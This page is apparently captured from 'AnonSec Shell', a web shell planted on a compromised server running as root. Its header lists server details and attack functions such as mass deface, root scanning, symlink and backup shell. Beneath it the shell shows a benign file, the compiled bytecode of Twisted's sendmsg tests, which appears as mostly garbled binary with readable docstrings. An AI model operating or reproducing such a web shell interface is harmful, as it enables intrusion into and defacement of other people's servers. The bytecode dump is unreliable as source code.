AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/twisted/python/test/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/twisted/python/test/__pycache__/test_sendmsg.cpython-310.pyc
o

�b"(�@s�dZddlZddlZddlZddlZddlmZmZmZmZddl	m
Z
mZmZm
Z
m	Z	ddlmZz
ddl	mZmZWneyGdZYnwdZdd	lmZdd
lmZddlmZmZddlmZdd
lmZddlm Z ddl!m"Z"ddl#m$Z$e"�%�r�ddl	m&Z&dZ'ndZ'zddl(m)Z)m*Z*m+Z+m,Z,Wn
ey�dZ-dZ.YnwdZ-dZ.Gdd�d�Z/dd�Z0Gdd�de1�Z2Gdd�de�Z3dd�Z4ee-e.�Gdd �d e$��Z5ee-e.�Gd!d"�d"e$��Z6dS)#z&
Tests for L{twisted.python.sendmsg}.
�N)�close�pathsep�pipe�read)�AF_INET�AF_INET6�
SOL_SOCKET�error�socket)�pack)�AF_UNIX�
socketpairTF)�skipIf)�reactor)�Deferred�inlineCallbacks)�ProcessDone)�ProcessProtocol)�FilePath)�platform)�TestCase)�MSG_DONTWAIT)�
SCM_RIGHTS�getSocketFamily�recvmsg�sendmsgz!Platform doesn't support sendmsg.�c@s@eZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�Zdd
�Z	dS)�	_FDHolderzP
    A wrapper around a FD that will remember if it has been closed or not.
    cCs
||_dS�N��_fd)�self�fd�r#�B/usr/lib/python3/dist-packages/twisted/python/test/test_sendmsg.py�__init__:s
z_FDHolder.__init__cCs|jS)z/
        Return the fileno of this FD.
        r�r!r#r#r$�fileno=sz_FDHolder.filenocCs|jr
t|j�d|_dSdS)zH
        Close the FD. If it's already been closed, do nothing.
        N)r rr&r#r#r$rCs

�z_FDHolder.closecCs,|jrt�d|j�d�t�|��dSdS)z>
        If C{self._fd} is unclosed, raise a warning.
        zFD z was not closed!N)r �warnings�warn�ResourceWarningrr&r#r#r$�__del__Ks�z_FDHolder.__del__cCs|Srr#r&r#r#r$�	__enter__Ssz_FDHolder.__enter__cCs|��dSr)r)r!�exc_type�	exc_value�	tracebackr#r#r$�__exit__Vsz_FDHolder.__exit__N)
�__name__�
__module__�__qualname__�__doc__r%r'rr+r,r0r#r#r#r$r5srcCst�\}}t|�t|�fS)zI
    Create a pipe, and return the two FDs wrapped in L{_FDHolders}.
    )rr)�r�wr#r#r$�	_makePipeZs
r7c@seZdZdZdefdd�ZdS)�ExitedWithStderrz,
    A process exited with some stderr.
    �returncCsd�dgt|j��}t|�S)zY
        Dump the errors in a pretty way in the event of a subprocess traceback.
        �
�)�join�list�args�repr�r!�resultr#r#r$�__str__gszExitedWithStderr.__str__N)r1r2r3r4�strrBr#r#r#r$r8bsr8c@s8eZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�ZdS)
�StartStopProcessProtocola�
    An L{IProcessProtocol} with a Deferred for events where the subprocess
    starts and stops.

    @ivar started: A L{Deferred} which fires with this protocol's
        L{IProcessTransport} provider when it is connected to one.

    @ivar stopped: A L{Deferred} which fires with the process output or a
        failure if the process produces output on standard error.

    @ivar output: A C{str} used to accumulate standard output.

    @ivar errors: A C{str} used to accumulate standard error.
    cCs t�|_t�|_d|_d|_dS)Nr;)r�started�stopped�output�errorsr&r#r#r$r%s
z!StartStopProcessProtocol.__init__cCs|j�|j�dSr)rE�callback�	transportr&r#r#r$�connectionMade��z'StartStopProcessProtocol.connectionMadecC�|j|7_dSr)rG�r!�datar#r#r$�outReceived�rLz$StartStopProcessProtocol.outReceivedcCrMr)rHrNr#r#r$�errReceived�rLz$StartStopProcessProtocol.errReceivedcCs6|�t�r|j�|j�dS|j�t|j|j��dSr)�checkrrFrIrG�errbackr8rH)r!�reasonr#r#r$�processEnded�s
z%StartStopProcessProtocol.processEndedN)	r1r2r3r4r%rKrPrQrUr#r#r#r$rDosrDc
Cs�ttj���j}ttj�}tt�	tj����j|d<t
�}tj|||tt
��|d���jd|fg|dddddd||id	�|S)
z�
    Start a script that is a peer of this test as a subprocess.

    @param script: the module name of the script in this directory (no
        package prefix, no '.py')
    @type script: C{str}

    @rtype: L{StartStopProcessProtocol}
    �
PYTHONPATHz.pys%drr6�r5�)�env�childFDs)r�sys�
executable�
asTextMode�path�dict�os�environrr<rDr�spawnProcess�__file__�sibling)�script�outputFD�pyExerY�ssppr#r#r$�_spawn�s

��ric@sfeZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�Zdd
�Z	dd�Z
eed�dd��Z
edd��ZdS)�SendmsgTestszB
    Tests for the Python2/3 compatible L{sendmsg} interface.
    cCstt�\|_|_dS)z0
        Create a pair of UNIX sockets.
        N)r
r�inputrGr&r#r#r$�setUp�szSendmsgTests.setUpcCs|j��|j��dS)z4
        Close the sockets opened by setUp.
        N)rkrrGr&r#r#r$�tearDown�s
zSendmsgTests.tearDowncCs4|j��|�tt|jd�}|�|jdtj�dS)z�
        If the underlying C{sendmsg} call fails, L{send1msg} raises
        L{socket.error} with its errno set to the underlying errno value.
        �hello, worldrN�	rkr�assertRaisesr	r�assertEqualr>�errno�EBADF�r!�excr#r#r$�test_syscallError�s
zSendmsgTests.test_syscallErrorcCs:|j��|�tt|jddgd�}|�|jdtj�dS)z�
        The behavior when the underlying C{sendmsg} call fails is the same
        whether L{sendmsg} is passed ancillary data or not.
        rn)rrs0123rNrortr#r#r$�#test_syscallErrorWithControlMessage�s

�z0SendmsgTests.test_syscallErrorWithControlMessagecCsTd}|�t|�t|j|��t|j�}|�|jd�|�|jd�|�|jg�dS)zI
        L{recvmsg} will retrieve a message sent via L{sendmsg}.
        �
hello, world!rN)	rq�lenrrkrrGrO�flags�	ancillary)r!�messagerAr#r#r$�test_roundtrip�s
zSendmsgTests.test_roundtripcCs^ddd}|j�d�t|j|�}|�|t|�k�t|jt|��}|�t|d�|�dS)zS
        L{sendmsg} returns the number of bytes which it was able to send.
        �xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx��FrN)rk�setblockingr�
assertTrueryrrGrq)r!r|�sent�receivedr#r#r$�test_shortsend�szSendmsgTests.test_shortsendcCs0t|jdgd�t|j�}|�|dgdf�dS)z�
        L{sendmsg} treats an empty ancillary data list the same way it treats
        receiving no argument for the ancillary parameter at all.
        rxrN)rrkrrGrqr@r#r#r$�test_roundtripEmptyAncillary�s
z)SendmsgTests.test_roundtripEmptyAncillaryz7MSG_DONTWAIT is only known to work as intended on LinuxcCsltd�D]*}z
t|jdtd�Wqty.}z|�|jdtj�WYd}~dSd}~ww|�	d�dS)z�
        The C{flags} argument to L{sendmsg} is passed on to the underlying
        C{sendmsg} call, to affect it in whatever way is defined by those
        flags.
        i r~)rzrNzHFailed to fill up the send buffer, or maybe send1msg blocked for a while)
�rangerrkr�OSErrorrqr>rr�EAGAIN�fail)r!�i�er#r#r$�
test_flags�s
���zSendmsgTests.test_flagsc
cs��td|j���}|jVt�\}}|�|j�|�|j�|�t|jdt	t
td|���fg�Wd�n1s;wY|jV|�
t|��d�d�|�
t|��d�d�dS)z�
        Calling L{sendmsg} with SOL_SOCKET, SCM_RIGHTS, and a platform-endian
        packed file descriptor number should send that file descriptor to a
        different process, where it can be retrieved by using L{recv1msg}.
        �pullpipesblonkr�NrsTest fixture data: blonk.
r;)rirGr'rEr7�
addCleanuprrrkrrrrFrqr)r!rh�pipeOut�pipeInr#r#r$�test_sendSubProcessFDs �
��z"SendmsgTests.test_sendSubProcessFDN)r1r2r3r4rlrmrvrwr}r�r�r�dontWaitSkipr�rr�r#r#r#r$rj�s	

rjc@s:eZdZdZdd�Zdd�Zdd�Zeed�d	d
��Z	dS)�GetSocketFamilyTestsz'
    Tests for L{getSocketFamily}.
    cCst|�}|�|j�|S)z�
        Create a new socket using the given address family and return that
        socket's file descriptor.  The socket will automatically be closed when
        the test is torn down.
        )r
r�r)r!�
addressFamily�sr#r#r$�_socket3szGetSocketFamilyTests._socketcC�|�tt|�t���dS)z�
        When passed the file descriptor of a socket created with the C{AF_INET}
        address family, L{getSocketFamily} returns C{AF_INET}.
        N)rqrrr�r&r#r#r$�	test_inet=�zGetSocketFamilyTests.test_inetcCr�)z�
        When passed the file descriptor of a socket created with the
        C{AF_INET6} address family, L{getSocketFamily} returns C{AF_INET6}.
        N)rqrrr�r&r#r#r$�
test_inet6Dr�zGetSocketFamilyTests.test_inet6z)Platform does not support AF_UNIX socketscCr�)z�
        When passed the file descriptor of a socket created with the C{AF_UNIX}
        address family, L{getSocketFamily} returns C{AF_UNIX}.
        N)rqrrr�r&r#r#r$�	test_unixKszGetSocketFamilyTests.test_unixN)
r1r2r3r4r�r�r�r�nonUNIXSkipr�r#r#r#r$r�-s
r�)7r4rrr`r[r(rrrrr
rrrr	�structrrr
�ImportErrorr��unittestr�twisted.internetr�twisted.internet.deferrr�twisted.internet.errorr�twisted.internet.protocolr�twisted.python.filepathr�twisted.python.runtimer�twisted.trial.unittestr�isLinuxrr��twisted.python.sendmsgrrrr�doImportSkip�importSkipReasonrr7�	Exceptionr8rDrirjr�r#r#r#r$�<module>sV��%
&{

Anon7 - 2022
AnonSec Team